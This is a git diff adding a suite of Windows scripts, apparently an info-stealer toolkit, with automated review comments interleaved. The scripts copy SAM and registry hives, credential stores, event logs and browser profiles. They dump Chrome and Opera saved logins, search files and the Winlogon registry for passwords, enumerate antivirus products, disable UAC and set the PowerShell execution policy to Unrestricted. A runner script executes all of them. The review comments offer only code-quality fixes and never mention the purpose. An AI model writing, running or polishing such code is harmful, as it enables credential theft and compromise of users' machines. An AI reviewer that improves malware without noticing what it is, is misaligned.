diff --git a/CODE/Antivirus_Finder.ps1 b/CODE/Antivirus_Finder.ps1 new file mode 100644 index 0000000..d016278 --- /dev/null +++ b/CODE/Antivirus_Finder.ps1 @@ -0,0 +1,42 @@ +# Define the list of antivirus names to search for +$antivirusNames = @("Norton", "McAfee", "Avast", "AVG", "Bitdefender", "Kaspersky", "ESET", "Sophos", "TrendMicro", "Comodo", "Panda", "Avira", "F-Secure", "GData", "Malwarebytes", "Spybot", "ZoneAlarm", "Webroot") + +# Check if the 'tree' command is available +if (-not (Get-Command tree -ErrorAction SilentlyContinue)) { + Write-Host "tree command not found. Please install or use an alternative method." + exit +} + +# Run the tree command and capture its output +$treeOutput = tree /f + +# Split the output into lines +$lines = $treeOutput -split "`n" + +# Remove duplicates from the antivirus names list +$antivirusNames = $antivirusNames | Sort-Object | Get-Unique + +# Initialize variables for progress tracking +$completedLines = 0 +$foundAntivirus = @() + +# Process each line +foreach ($line in $lines) { + $completedLines++ + + # Check for antivirus names in the line, ensuring it's a complete word + foreach ($name in $antivirusNames) { + if ($line -match "\b$name\b") { + $foundAntivirus += $name + } + } +} + +# Print the total lines processed and what was found to the console +Write-Host "Processed $completedLines lines." +if ($foundAntivirus.Count -gt 0) { + Write-Host "Found Antivirus:" + $foundAntivirus | Sort-Object -Unique | ForEach-Object { Write-Host $_ } +} else { + Write-Host "No antivirus found." +} diff --git a/CODE/Browser_And_Policies_Miner.ps1 b/CODE/Browser_And_Policies_Miner.ps1 new file mode 100644 index 0000000..b001a63 --- /dev/null +++ b/CODE/Browser_And_Policies_Miner.ps1 
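Review bot: The pattern built in the inner loop, `if ($line -match "\b$name\b")`, interpolates each list entry unescaped, so any future name containing a regex metacharacter would be treated as a pattern rather than a literal (the current entries, `F-Secure` included, happen to be safe); `if ($line -match "\b$([regex]::Escape($name))\b")` keeps the match literal. The early `exit` on the tree-not-found path returns success to the caller, so a wrapper cannot distinguish that case from a clean run; `exit 1` would. A header comment should state that `tree /f` is run without a path and therefore walks from whatever the current working directory is.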
@@ -0,0 +1,59 @@ +# Define the list of source paths with placeholders +$sourcePaths = @( + "C:\Users\{}\AppData\Local\Microsoft\Edge\User Data\Default\Network", + "C:\Users\{}\AppData\Local\Google\Chrome\User Data\Default\Network", + "C:\Users\{}\AppData\Roaming\Mozilla\Firefox\Profiles", + "C:\Users\{}\AppData\Roaming\Opera Software\Opera Stable\Network", + "C:\Users\{}\AppData\Roaming\Opera Software\Opera GX Stable\Network", + 'C:\\WINDOWS\\system32\\config\\SAM', + 'C:\\Windows\\System32\\config', + 'C:\\Windows\\System32\\GroupPolicy', + 'C:\\Windows\\System32\\GroupPolicyUsers', + 'C:\\Windows\\System32\\winevt\\Logs' +) + +# Define the list of identifiers for renaming +$identifiers = @( + "Edge", + "Chrome", + "Firefox", + "OperaStable", + "OperaGXStable", + "SAM", + "SystemConfig", + "GroupPolicy", + "GroupPolicyUsers", + "WindowsEventLogs" +) + +# Get the current user's name +$currentUser = $env:USERNAME + +# Define the base directory for the destination +$baseDirectory = "DATA" + +# Loop through each source path +for ($i = 0; $i -lt $sourcePaths.Count; $i++) { + # Replace the placeholder with the current user's name + $sourcePath = $sourcePaths[$i] -replace '\{\}', $currentUser + $identifier = $identifiers[$i] + + # Define the destination path + $destinationPath = Join-Path -Path $baseDirectory -ChildPath "USER_$identifier" + + # Check if the source path exists + if (Test-Path $sourcePath) { + # Attempt to copy the folder to the DATA directory and rename it + try { + Copy-Item -Path $sourcePath -Destination $destinationPath -Recurse -Force + # Print the message to the console + Write-Host "Copied $sourcePath to $destinationPath" + } catch { + # Print the error message to the console + Write-Host "Failed to copy $sourcePath to $destinationPath. Error: $_" + } + } else { + # Print the message to the console + Write-Host "Source path $sourcePath does not exist." + } +} 
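Review bot: `$sourcePaths` and `$identifiers` are parallel arrays joined only by index in the `for` loop, so adding or removing one entry silently shifts every label after it; an ordered hashtable (`$targets = [ordered]@{ Edge = "C:\Users\{}\..." }` iterated with `.GetEnumerator()`) keeps each path with its identifier. `$baseDirectory = "DATA"` is relative to the caller's working directory rather than the script's, which the header comment should say. The five single-quoted entries use doubled backslashes (`'C:\\WINDOWS\\...'`) although single quotes already make backslashes literal; the mixed quoting style reads as if they were escaped and should be normalised to the form used by the first five.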
diff --git a/CODE/Copy_Media.py b/CODE/Copy_Media.py new file mode 100644 index 0000000..eabce46 --- /dev/null +++ b/CODE/Copy_Media.py @@ -0,0 +1,52 @@ +import os +import shutil +from tqdm import tqdm + + +def estimate_folder_size(folder_path): + """Estimate the size of a folder.""" + total_size = 0 + for dirpath, dirnames, filenames in os.walk(str(folder_path)): + for f in filenames: + fp = os.path.join(str(dirpath), f) + total_size += os.path.getsize(fp) + return total_size + + +def copy_folders(source_paths, destination_path): + """Copy folders to a specified destination with a progress bar.""" + for source_path in tqdm(source_paths, desc="Copying folders"): + shutil.copytree(str(source_path), os.path.join(str(destination_path), os.path.basename(str(source_path)))) + + +def main(): + # Get the current user's username + username = os.getlogin() + + # Define the source folders using the current user's username + source_folders = [ + f"C:/Users/{username}/Music", + f"C:/Users/{username}/Pictures", + f"C:/Users/{username}/Videos" + ] + + # Get the script's directory + script_dir = os.path.dirname(os.path.realpath(__file__)) + # Define the destination folder as a DATA folder within the script's directory + destination_folder = os.path.join(script_dir, "DATA") + + # Create the DATA folder if it doesn't exist + if not os.path.exists(destination_folder): + os.makedirs(destination_folder) + + # Estimate the sizes of the source folders + estimated_sizes = {} + for folder in source_folders: + if os.path.exists(folder): + estimated_sizes[folder] = estimate_folder_size(folder) + else: + print(f"ERROR: Folder not found: {folder}") + + # Proceed with copying the folders without user confirmation + copy_folders(source_folders, destination_folder) + print("INFO: Folders copied successfully.") diff --git a/CODE/Copy_System_Files.py b/CODE/Copy_System_Files.py new file mode 100644 index 0000000..cceaecb --- /dev/null +++ b/CODE/Copy_System_Files.py 
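Review bot: `estimated_sizes` in `main` is filled by `estimate_folder_size` and then never read, so the whole size pass is dead work; either drop it or print the totals it computes. `estimate_folder_size` unpacks `dirnames` without using it, conventionally written `for dirpath, _, filenames in os.walk(folder_path):`, and the `str(...)` wrappers on values that are already strings add nothing. `tqdm` is a third-party import with no requirements file in this commit; a module docstring naming the dependency, or a requirements entry, is needed.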
@@ -0,0 +1,128 @@ +import getpass +import os +import shutil +import subprocess + + +USER_NAME = getpass.getuser() +DESTINATION_PREFIX = "DATA\\" + USER_NAME + +paths_and_name = [ + "%windir%\\repair\\sam", "SAM Backup", + "%windir%\\System32\\config\\RegBack\\SAM", "SAM Registry Backup", + "%windir%\\repair\\system", "System Backup", + "%windir%\\repair\\software", "Software Backup", + "%windir%\\repair\\security", "Security Backup", + "%windir%\\debug\\NetSetup.log", "NetSetup Debug Log", + "%windir%\\iis6.log", "IIS 6 Log", + "%windir%\\system32\\logfiles\\httperr\\httperr1.log", "HTTP Error Log", + "C:\\sysprep.inf", "Sysprep Configuration File", + "C:\\sysprep\\sysprep.inf", "Sysprep Configuration File (Alternate)", + "C:\\sysprep\\sysprep.xml", "Sysprep XML Configuration", + "%windir%\\Panther\\Unattended.xml", "Unattended Windows Setup XML", + "C:\\inetpub\\wwwroot\\Web.config", "IIS Web Configuration", + "%windir%\\system32\\config\\AppEvent.Evt", "Application Event Log", + "%windir%\\system32\\config\\SecEvent.Evt", "Security Event Log", + "%windir%\\system32\\config\\default.sav", "Default Registry Backup", + "%windir%\\system32\\config\\security.sav", "Security Registry Backup", + "%windir%\\system32\\config\\software.sav", "Software Registry Backup", + "%windir%\\system32\\config\\system.sav", "System Registry Backup", + "%windir%\\system32\\inetsrv\\config\\applicationHost.config", "IIS Application Host Configuration", + "%windir%\\system32\\inetsrv\\config\\schema\\ASPNET_schema.xml", "ASP.NET Schema XML", + "%windir%\\System32\\drivers\\etc\\hosts", "Hosts File", + "%windir%\\System32\\drivers\\etc\\networks", "Networks File", + "C:\\inetpub\\logs\\LogFiles", "IIS Log Files", + "C:\\inetpub\\wwwroot", "IIS Web Root", + "C:\\inetpub\\wwwroot\\default.htm", "Default IIS Web Page", + "C:\\laragon\\bin\\php\\php.ini", "Laragon PHP Configuration", + "C:\\php\\php.ini", "PHP Configuration", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\FileZilla", 
"FileZilla Local Data", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\FileZilla\\cache.xml", "FileZilla Cache XML", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", + "Google Chrome Login Data", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat", "Windows User Class Data", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\Programs\\Microsoft VS Code\\updater.log", "VS Code Updater Log", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\Code\\User\\settings.json", "VS Code User Settings", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\Code\\User\\workspaceStorage", "VS Code Workspace Storage", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\filezilla-server.xml", + "FileZilla Server Configuration", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\filezilla.xml", "FileZilla Client Configuration", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\logs", "FileZilla Logs", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\recentservers.xml", "FileZilla Recent Servers", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\sitemanager.xml", "FileZilla Site Manager", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\Microsoft\\Credentials", "Microsoft Credentials", + "C:\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Outlook", "Outlook User Data", + "C:\\Users\\{DESTINATION_PREFIX}\\NTUSER.DAT", "NT User Profile", + "C:\\wamp\\bin\\php\\php.ini", "WAMP PHP Configuration", + "C:\\Windows\\php.ini", "Windows PHP Configuration", + "C:\\Windows\\System32\\config\\NTUSER.DAT", "NT User Profile (System)", + "C:\\Windows\\System32\\drivers\\etc\\hosts", "Hosts File (System)", + "C:\\Windows\\System32\\inetsrv\\config\\administration.config", "IIS Administration Configuration", + "C:\\Windows\\System32\\inetsrv\\config\\applicationHost.config", "IIS Application Host Configuration 
(System)", + "C:\\Windows\\System32\\inetsrv\\config\\applicationHost.hist", "IIS Application Host History", + "C:\\Windows\\System32\\inetsrv\\config\\monitoring\\global.xml", "IIS Monitoring Configuration", + "C:\\Windows\\System32\\inetsrv\\config\\redirection.config", "IIS Redirection Configuration", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\applicationHost.xsd", "IIS Application Host Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\ASPNET_schema.xml", "ASP.NET Schema XML (System)", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\dotnetconfig.xsd", ".NET Configuration Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\IISProvider_schema.xml", "IIS Provider Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\IIS_schema.xml", "IIS Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\rewrite_schema.xml", "Rewrite Schema", + "C:\\Windows\\System32\\LogFiles\\W3SVC1", "IIS Log Files (W3SVC1)", + "C:\\Windows\\system.ini", "System Configuration", + "C:\\xampp\\apache\\conf\\extra\\httpd-ssl.conf", "Apache SSL Configuration", + "C:\\xampp\\apache\\conf\\extra\\httpd-vhosts.conf", "Apache Virtual Hosts Configuration", + "C:\\xampp\\apache\\conf\\httpd.conf", "Apache HTTP Server Configuration", + "C:\\xampp\\apache\\logs\\access.log", "Apache Access Log", + "C:\\xampp\\apache\\logs\\php_error_log", "Apache PHP Error Log", + "C:\\xampp\\phpMyAdmin\\config.inc.php", "phpMyAdmin Configuration", + "C:\\xampp\\php\\php.ini", "XAMPP PHP Configuration", + "C:\\xampp\\xampp-control.log", "XAMPP Control Log" +] + + +def copy_and_rename_files(paths_and_name): + for file_path, file_name in zip(paths_and_name[::2], paths_and_name[1::2]): + try: + file_path = os.path.expandvars(file_path) + if not os.path.exists(file_path): + print(f"The file {file_path} does not exist.") + print() + continue + + shutil.copy2(file_path, os.getcwd()) + new_file_name = f"{USER_NAME}_{file_name}" + new_file_path = os.path.join(os.getcwd(), new_file_name) + 
if os.path.exists(new_file_path): + os.remove(new_file_path) # Delete the existing file + os.rename(os.path.join(os.getcwd(), os.path.basename(file_path)), new_file_path) + print(f"INFO: Copied and renamed file to {new_file_name}") + print() + except FileNotFoundError: + print(f"ERROR: The file at path {file_path} was not found.") + print() + except Exception as e: + print(f"ERROR: An error occurred: {e}") + print() + + +def execute_tree_batch_file(): + # Define the name of the batch file + batch_file_name = "Tree_Command.bat" + + # Check if the batch file exists in the current working directory + if os.path.exists(batch_file_name): + # Construct the command to run the batch file + command = [batch_file_name] + + # Run the batch file and wait for it to finish + subprocess.run(command, check=True) + print(f"INFO: {batch_file_name} has been executed successfully.") + print() + else: + print(f"ERROR: {batch_file_name} not found in the current working directory.") + print() + + +execute_tree_batch_file() +copy_and_rename_files(paths_and_name) diff --git a/CODE/Simple_Password_Miner.py b/CODE/Simple_Password_Miner.py new file mode 100644 index 0000000..88962ca --- /dev/null +++ b/CODE/Simple_Password_Miner.py 
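Review bot: `paths_and_name` is a flat list of alternating path/label strings consumed through `zip(paths_and_name[::2], paths_and_name[1::2])`, so one missing or extra element silently pairs every later path with the wrong label; a list of `(path, label)` tuples, or a dict, removes that failure mode and the slicing. The parameter of `copy_and_rename_files` shadows the module-level `paths_and_name`, and the trailing `except Exception as e` flattens `PermissionError`, `IsADirectoryError` and the like into one generic message — catching `OSError` and including `type(e).__name__` would keep the cause visible. `execute_tree_batch_file()` and `copy_and_rename_files(paths_and_name)` run at import time; an `if __name__ == "__main__":` guard, as Voyager.py uses, would keep the functions importable.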
@@ -0,0 +1,138 @@ +import os +import sqlite3 +import winreg +import shutil + + +def copy_file(src_path, dest_dir): + """ + Copies a file to a specified directory. + + :param src_path: The path of the source file. + :param dest_dir: The path of the destination directory. + """ + try: + src_path = str(src_path) # Ensure src_path is a string + dest_dir = str(dest_dir) # Ensure dest_dir is a string + if not os.path.exists(dest_dir): + os.makedirs(dest_dir) + dest_path = os.path.join(dest_dir, os.path.basename(src_path)) + shutil.copy2(src_path, dest_path) + print(f"INFO: Copied file to: {dest_path}") + except Exception as e: + print(f"ERROR: {e}") + + +def search_filesystem(): + print("INFO: Searching the file system for passwords...") + extensions = ['*.xml', '*.ini', '*.txt'] + for ext in extensions: + for line in os.popen(f'findstr /si password {ext}'): + # Split the line by ':' to separate the file path from the matched line + parts = line.strip().split(':', 1) + if len(parts) > 1: + file_path = parts[0].strip() # The first part is the file path + print(f"INFO: Found password in file: {file_path}") + copy_file(file_path, "DATA/found_passwords") + + +def search_desktop(): + print("INFO: Searching the desktop for password files...") + desktop_path = os.path.join(os.path.expanduser("~"), "Desktop") + for file in os.listdir(desktop_path): + if "password" in file.lower(): + file_path = os.path.join(desktop_path, file) + print(f"INFO: Found password file on desktop: {file_path}") + copy_file(file_path, "DATA/found_passwords") + + +def search_registry(): + print("INFO: Searching the registry for passwords...") + try: + key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon") + i = 0 + while True: + try: + value = winreg.EnumValue(key, i) + if "password" in value[0].lower(): + print(f"INFO: Found password in registry: {value[0]} = {value[1]}") + i += 1 + except OSError: + break + except OSError: + print("WARNING: Registry 
search failed.") + + +def search_google(): + print("INFO: Searching for stored passwords in browsers...") + # Define the path to the Chrome Login Data file + chrome_login_data_path = os.path.join(os.path.expanduser("~"), "AppData", "Local", "Google", "Chrome", "User Data", + "Default", "Login Data") + + # Check if the file exists + if not os.path.exists(chrome_login_data_path): + print( + "WARNING: Chrome Login Data file not found. Is Chrome installed and the 'Encrypt passwords' feature disabled?") + return + + # Connect to the SQLite database + try: + conn = sqlite3.connect(chrome_login_data_path) + cursor = conn.cursor() + + # Execute a query to retrieve all stored passwords + cursor.execute("SELECT action_url, username_value, password_value FROM logins") + results = cursor.fetchall() + + if results: + for result in results: + print( + f"INFO: Found password in Chrome: URL = {result[0]}, Username = {result[1]}, Password = {result[2]}") + else: + print("WARNING: No passwords found in Chrome.") + + # Close the database connection + conn.close() + except sqlite3.Error as e: + print(f"ERROR: Error accessing Chrome Login Data: {e}") + + +def search_opera(): + print("INFO: Searching for stored passwords in Opera...") + opera_login_data_path = os.path.join(os.path.expanduser("~"), "AppData", "Roaming", "Opera Software", + "Opera Stable", "Login Data") + + if not os.path.exists(opera_login_data_path): + print( + "WARNING: Opera Login Data file not found. 
Is Opera installed and the 'Encrypt passwords' feature disabled?") + return + + try: + conn = sqlite3.connect(opera_login_data_path) + cursor = conn.cursor() + + cursor.execute("SELECT action_url, username_value, password_value FROM logins") + results = cursor.fetchall() + + if results: + for result in results: + print( + f"INFO: Found password in Opera: URL = {result[0]}, Username = {result[1]}, Password = {result[2]}") + else: + print("WARNING: No passwords found in Opera.") + + conn.close() + except sqlite3.Error as e: + print(f"ERROR: Error accessing Opera Login Data: {e}") + + +def main(): + search_registry() + search_filesystem() + search_desktop() + search_google() + search_opera() + + +if __name__ == "__main__": + main() diff --git a/CODE/System_Info_Grabber.py b/CODE/System_Info_Grabber.py new file mode 100644 index 0000000..6252b5f --- /dev/null +++ b/CODE/System_Info_Grabber.py 
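Review bot: `search_google` and `search_opera` are the same block with a different path and label; one helper taking `(login_data_path, browser_name)` and called twice removes the duplication. In both, `conn.close()` is skipped when `cursor.execute` raises, and the handle from `winreg.OpenKey` in `search_registry` is never closed; `with contextlib.closing(sqlite3.connect(path)) as conn:` (needs `import contextlib`) and `with winreg.OpenKey(...) as key:` release both on every path.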
@@ -0,0 +1,127 @@ +import getpass +import socket +import subprocess +import re +import uuid +import psutil +import wmi + +USER_NAME = getpass.getuser() +DESTINATION_PREFIX = "DATA\\" + USER_NAME + + +def filter_processes(): + # Define the process names to filter + system_processes = ['System', 'smss.exe', 'wininit.exe', 'services.exe', 'csrss.exe'] + network_processes = ['svchost.exe', 'wininit.exe', 'netsh.exe', 'net.exe'] + web_browser_processes = ['chrome.exe', 'firefox.exe', 'iexplore.exe', 'msedge.exe'] + email_clients = ['outlook.exe', 'thunderbird.exe', 'microsoft-windows-live-mail.exe'] + office_processes = ['excel.exe', 'word.exe', 'powerpoint.exe', 'outlook.exe'] + antivirus_security_processes = ['msmpeng.exe'] + + # Get a list of all running processes + processes = [] + for process in psutil.process_iter(['pid', 'name']): + try: + # Use as_dict() to get a dictionary representation of the process + pinfo = process.as_dict(attrs=['pid', 'name']) + processes.append(pinfo) + except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess): + pass + + # Filter and print the list of processes + for p in processes: + if (p['name'] in system_processes or p['name'] in network_processes + or p['name'] in web_browser_processes or p['name'] in email_clients or p['name'] in office_processes or + p[ + 'name'] in antivirus_security_processes): + print(f"INFO: PID = {p['pid']}, Program Name = {p['name']}") + print() + + +def extract_version_number(output): + # Adjusted regular expression pattern to match version numbers with multiple dots, + # This pattern looks for sequences of digits separated by dots, ensuring there are at least two dots + pattern = r'\b\d+(\.\d+){2,}\b' + + # Search for the first match of the pattern in the output + match = re.search(pattern, output) + + # If a match is found, return the matched string (the version number) + # Otherwise, return None + return match.group(0) if match else None + + +def get_windows_version_info(): + # Command 
to get Windows version and type + command = 'wmic os get Caption, Version' + + # Execute the command and capture the output + result = subprocess.run(command, stdout=subprocess.PIPE, text=True, shell=True) + + # Extract the version number using the extract_version_number function + version_number = extract_version_number(result.stdout) + + # Extract the type using regular expressions + type_match = re.search(r'(\bHome\b|\bEnterprise\b)', result.stdout, re.IGNORECASE) + type = type_match.group(1) if type_match else None + + # Return the version number and type + return version_number, type + + +def get_network_info(): + # Get the hostname + hostname = socket.gethostname() + + # Get the IPv4 address + ipv4 = socket.gethostbyname(hostname) + + # Get the IPv6 address + ipv6 = [item[4][0] for item in socket.getaddrinfo(hostname, None, socket.AF_INET6)] + + # Get the MAC address + # This is a workaround as Python does not provide a direct way to get the MAC address + # We use the UUID to generate a unique identifier for the network interface + mac_address = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0, 8 * 6, 8)][::-1]) + + return ipv4, ipv6, mac_address + + +def get_computer_model(): + c = wmi.WMI() + for system in c.Win32_ComputerSystem(): + return system.Model + + +def execute_command(command): + process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) + stdout, stderr = process.communicate() + return stdout + + +ipv4, ipv6, mac_address = get_network_info() +version_number, type = get_windows_version_info() + +print(f"INFO: Raw Processes Running Suitable to dump:- {filter_processes()}") +print() +print(f"INFO: Computer Model: {get_computer_model()}") +print() +print("INFO: CPU", execute_command('wmic cpu get Name').splitlines()[2].strip()) +print() +print("INFO: GPU", execute_command('wmic path win32_VideoController get Name').splitlines()[2].strip()) +print() +print("INFO: RAM", execute_command('wmic 
MEMORYCHIP get BankLabel, Capacity, MemoryType').splitlines()[2].strip()) +print() +print("INFO: SSD", execute_command('wmic diskdrive get Model, MediaType, Size').splitlines()[2].strip()) +print() +print(f"INFO: Windows Version Number: {version_number}") +print() +print(f"INFO: Windows Type: {type}") +print() +print(f"INFO: IPv4: {ipv4}") +print() +print(f"INFO: IPv6: {ipv6}") +print() +print(f"INFO: MAC Address: {mac_address}") +print() diff --git a/CODE/Tree_Command.bat b/CODE/Tree_Command.bat new file mode 100644 index 0000000..71aae74 --- /dev/null +++ b/CODE/Tree_Command.bat @@ -0,0 +1,11 @@ +@echo off +setlocal + +:: Get the current user's name +for /f "tokens=*" %%i in ('echo %username%') do set userName=%%i + +:: Define the output file name based on the current user's name +set outputFile=%userName%_tree.txt + +:: Run the tree command and redirect the output to the file +powershell.exe -Command "& {tree C:\ | Out-File -FilePath %outputFile%}" diff --git a/CODE/UAC.ps1 b/CODE/UAC.ps1 new file mode 100644 index 0000000..c03f4d8 --- /dev/null +++ b/CODE/UAC.ps1 
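Review bot: `print(f"INFO: Raw Processes Running Suitable to dump:- {filter_processes()}")` interpolates the return value of a function that only prints and returns `None`, so the console shows the process lines followed by a literal `None`; print the heading, then call `filter_processes()` on its own line. `type = type_match.group(1) if type_match else None` and the module-level `version_number, type = ...` shadow the `type` builtin — `edition` would be clearer. `DESTINATION_PREFIX` is defined but never used, and `execute_command` discards `stderr` while every result is indexed with `.splitlines()[2]` unguarded, so an absent or failing `wmic` surfaces as an `IndexError` rather than a readable message.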
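Review bot: `for /f "tokens=*" %%i in ('echo %username%') do set userName=%%i` spawns a subshell just to copy one environment variable into another; `set "userName=%USERNAME%"` does the same in one step. The `setlocal` has no matching `endlocal`, which is harmless at script end but worth a comment, and the comment block should state that the output file lands in the current directory.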
@@ -0,0 +1,26 @@ +# Define the path to the UAC settings in the registry +$UACPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" + +# Check the current UAC setting +$UACStatus = Get-ItemProperty -Path $UACPath -Name "EnableLUA" -ErrorAction SilentlyContinue + +if ($null -eq $UACStatus) { + Write-Host "ERROR: UAC status could not be determined. Please ensure the script is run with administrative privileges." +} elseif ($UACStatus.EnableLUA -eq 1) { + # UAC is on, disable it + Set-ItemProperty -Path $UACPath -Name "EnableLUA" -Value 0 + Write-Host "INFO: UAC has been disabled. Would you like to restart the computer now? (Y/N)" +} else { + # UAC is off, enable it + Set-ItemProperty -Path $UACPath -Name "EnableLUA" -Value 1 + Write-Host "INFO: UAC has been enabled. Would you like to restart the computer now? (Y/N)" +} + +$confirmation = Read-Host + +if ($confirmation -eq "Y" -or $confirmation -eq "y") { + Write-Host "INFO: Restarting the computer..." + Restart-Computer -Force +} else { + Write-Host "INFO: Restart canceled by user." +} diff --git a/CODE/UACPY.py b/CODE/UACPY.py new file mode 100644 index 0000000..cab02e8 --- /dev/null +++ b/CODE/UACPY.py 
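Review bot: Neither `Set-ItemProperty` call in the `elseif`/`else` branches is checked, and the cmdlet raises a non-terminating error by default, so an unelevated run still prints "INFO: UAC has been disabled/enabled" although the value did not change; wrap each in `try { Set-ItemProperty -Path $UACPath -Name "EnableLUA" -Value 0 -ErrorAction Stop } catch { Write-Host "ERROR: $_"; exit 1 }` and report success only inside the `try`. The "(Y/N)" question is emitted with `Write-Host` while `Read-Host` is called with no prompt, so `$confirmation = Read-Host "Restart now? (Y/N)"` keeps the question with the input. The success message should also say the change takes effect only after a reboot, as UACPY.py's message does.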
@@ -0,0 +1,42 @@ +import subprocess + + +def get_uac_setting(): + # Query the current UAC setting using PowerShell + uac_setting = subprocess.run(["powershell", "-Command", + "Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' -Name 'EnableLUA'"], + capture_output=True, text=True, check=True) + # Extract the value + value = uac_setting.stdout.strip() + return value + + +def set_uac_setting(value): + # Set the UAC setting using PowerShell + subprocess.run(["powershell", "-Command", + "Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' -Name 'EnableLUA' -Value " + value], + check=True) + + +def main(): + print("INFO: Script started executing.") + # Get the current UAC setting + old_uac_setting = get_uac_setting() + print(f"INFO: Old UAC setting: {old_uac_setting}") + + # Change the UAC setting to the opposite value + new_uac_setting = '0' if old_uac_setting == '1' else '1' + set_uac_setting(new_uac_setting) + print(f"INFO: New UAC setting: {new_uac_setting}") + + # Ask the user to restart their computer + print("INFO: Please restart your computer for the changes to take effect.") + # Prompt the user to restart with confirmation + user_input = input("Do you want to restart your computer now? (yes/no): ") + if user_input.lower() == 'yes': + subprocess.run(["powershell", "-Command", "shutdown /r /t 0"], check=True) + else: + print("INFO: Restart cancelled by the user.") + + +main() diff --git a/CODE/Voyager.py b/CODE/Voyager.py new file mode 100644 index 0000000..b38e9ca --- /dev/null +++ b/CODE/Voyager.py 
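Review bot: `main()` runs unconditionally at import, so importing this module to reuse `get_uac_setting` would toggle UAC and prompt for a reboot; guard it with `if __name__ == "__main__": main()` as Voyager.py and Simple_Password_Miner.py already do. `print(f"INFO: New UAC setting: {new_uac_setting}")` reports the value the script intended to write rather than re-reading the key after `set_uac_setting`, so a write that fails without a non-zero PowerShell exit code is reported as success; call `get_uac_setting()` again and print that. The reboot is issued via `["powershell", "-Command", "shutdown /r /t 0"]`; `["shutdown", "/r", "/t", "0"]` avoids the extra shell layer.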
@@ -0,0 +1,64 @@ +import ctypes +import os +import platform +import subprocess + + +def execute_code(script_path): + if os.path.splitext(script_path)[1].lower() == '.ps1': + unblock_command = f'powershell.exe -Command "Unblock-File -Path {script_path}"' + subprocess.run(unblock_command, shell=True, check=True) + print("INFO: Script unblocked.") + print() + + command = f'powershell.exe -Command "& {script_path}"' + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, stderr = process.communicate() + + # Decode the output from bytes to string + stdout = stdout.decode('utf-8') + stderr = stderr.decode('utf-8') + + # Return the output and error messages + return stdout, stderr + + +def set_execution_policy(): + command = "powershell.exe Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force" + try: + subprocess.run(command, shell=True, check=True) + print("INFO: Execution policy has been set to Unrestricted.") + print() + except subprocess.CalledProcessError as e: + print(f"WARNING: Failed to set execution policy to Unrestricted. Error: {e}") + print() + + +def checks(): + def is_admin(): + try: + return ctypes.windll.shell32.IsUserAnAdmin() + except: + return False + + if platform.system() == 'Windows': + if is_admin(): + print("SYSTEM: code.py is running with administrative privileges.") + else: + print("WARNING: code.py is running without administrative privileges.") + print("WARNING: This may cause errors") + else: + print("This script is intended to run on Windows.") + + +def main(): + set_execution_policy() + checks() + for script_path in ["./Copy_System_Files.py", "./Browser_And_Policies_Miner.ps1", "./Window_Features_Lister.bat", + "./Antivirus_Finder.ps1", "./Simple_Password_Miner.py", "./Copy_Media.py", + "./System_Info_Grabber.py", "./Zipper.py"]: + execute_code(script_path) + + +if __name__ == "__main__": + main() 
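Review bot: `is_admin` inside `checks` uses a bare `except:`, which also swallows `KeyboardInterrupt` and `SystemExit`; `except (AttributeError, OSError):` covers the non-Windows and failed-call cases it is guarding. The status messages name `code.py` while the file is `Voyager.py`; use `os.path.basename(__file__)` so they stay right after renames. `set_execution_policy` changes a persistent per-user setting with `-Scope CurrentUser` and nothing restores it afterwards, so the host is left with `Unrestricted` after the run; read `Get-ExecutionPolicy -Scope CurrentUser` first and restore it at the end of `main`, or use `-Scope Process` so the change dies with the process.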
diff --git a/CODE/Window_Features_Lister.bat b/CODE/Window_Features_Lister.bat new file mode 100644 index 0000000..7cc3e04 --- /dev/null +++ b/CODE/Window_Features_Lister.bat @@ -0,0 +1,18 @@ +@echo off +echo INFO: Listing all enabled Windows features: +echo. + +:: Get the current user's name +set USERNAME=%USERNAME% + +:: Check if the DATA folder exists, if not, create it +if not exist DATA mkdir DATA + +:: Create a new text file named after the user with the output of the command inside the DATA folder +dism /online /get-features /format:table > DATA\%USERNAME%_WinFeatures.txt + +:: Print the output of the command to the console +echo INFO: The list of enabled Windows features has been saved to DATA\%USERNAME%_WinFeatures.txt + +:: Print a message to the console indicating the command output has been logged +echo INFO: Command output has been logged to DATA\%USERNAME%_WinFeatures.txt diff --git a/CODE/Zipper.py b/CODE/Zipper.py new file mode 100644 index 0000000..1007599 --- /dev/null +++ b/CODE/Zipper.py 
